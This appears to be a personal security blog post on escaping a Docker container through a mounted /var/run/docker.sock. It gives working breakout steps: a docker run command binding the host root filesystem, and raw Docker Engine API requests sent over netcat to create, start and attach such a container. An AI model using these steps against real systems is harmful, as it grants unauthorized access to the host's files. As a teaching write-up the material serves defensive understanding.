Docker breakout: Mounted docker socket
As we all know dockers are pretty much in use everywhere now, so it's essential to make sure containers are secure. I have been playing around with docker breakouts for a couple of weeks and wanted to document them. This blog will deal with mounted docker socket in a container.
So what is the docker socket? Well, basically it is a UNIX domain socket over which the docker daemon listens from the docker engine. It generally resides at /var/run/docker.sock To explain in simple terms, all the API requests to make, create, or run containers use this socket. So why is it mounted on a container? It is one of the ways to use Docker client inside a container. When this socket is mounted on a container, it allows the attacker to create containers and run them on the host system. (Check out this blog abt creating containers inside a container)
Exploitation
We abuse the docker socket to create and run a container that has the host’s file system mounted on itself. Since the container has the docker socket mounted on itself, it means that we will actually be sending the API requests to the Docker daemon on the host system which is outside the container. In essence, it means that when we reference the file system mounts, it will mount the host’s file system and not the container’s from which we are running the commands.
Let's create ourselves a container with a mounted docker socket to work with.
I mounted the docker socket at /var/run/docker.sock , the docker socket might be mounted anywhere. It is better to check where the socket is located as we would require its path.
Method 1: Using Docker
Check if Docker is installed in the container, if it is we could run containers directly using docker.
If we can use docker, it’s a piece of cake to create a container with the volume mount of the host file system.
As we can see, we can get the whole host file system using this command docker run -v /:/host -it ubuntu This will spawn a container with the host’s file system located at /host.
Method 2: Using Netcat
We can make API requests via the UNIX socket manually if the docker isn't installed in the docker. Check out the Docker Engine API docs to see all the API requests you can make. First, we need to connect to the docker socket, for this, we will need the netcat-openbsd. The command is nc -U /var/run/docker.sock This will open up a connection to the docker socket. We can make our API requests from here. For instance, to list all the containers running, we can make a GET request to /containers/json The request is
GET /containers/json HTTP/1.1
Host:
Using API requests, all we need to do is replicate the docker run command we used in the first method. We need to make separate requests to create, start and attach the container. To create a container, the request is
POST /containers/create HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 265{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "ubuntu","Volumes": {"/hostfs/": {}},"HostConfig": {"Binds": ["/:/hostfs"]}}
To start the container, the request is (replace the id with the id of the container)
POST /containers/<id>/start HTTP/1.1
Host:
To attach to the container, the request is
Attaching a container
POST /containers/<id>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Upgrade: tcp
Connection: Upgrade
As you can see, we get ourselves a nice terminal on the container which has access to the host’s file system.
Conclusion -
Even though this vulnerability is trivial, it helped me to understand docker at a better level, and how the Docker API works. I hope to blog about the rest of the docker breakouts as well. Connect to me on LinkedIn.
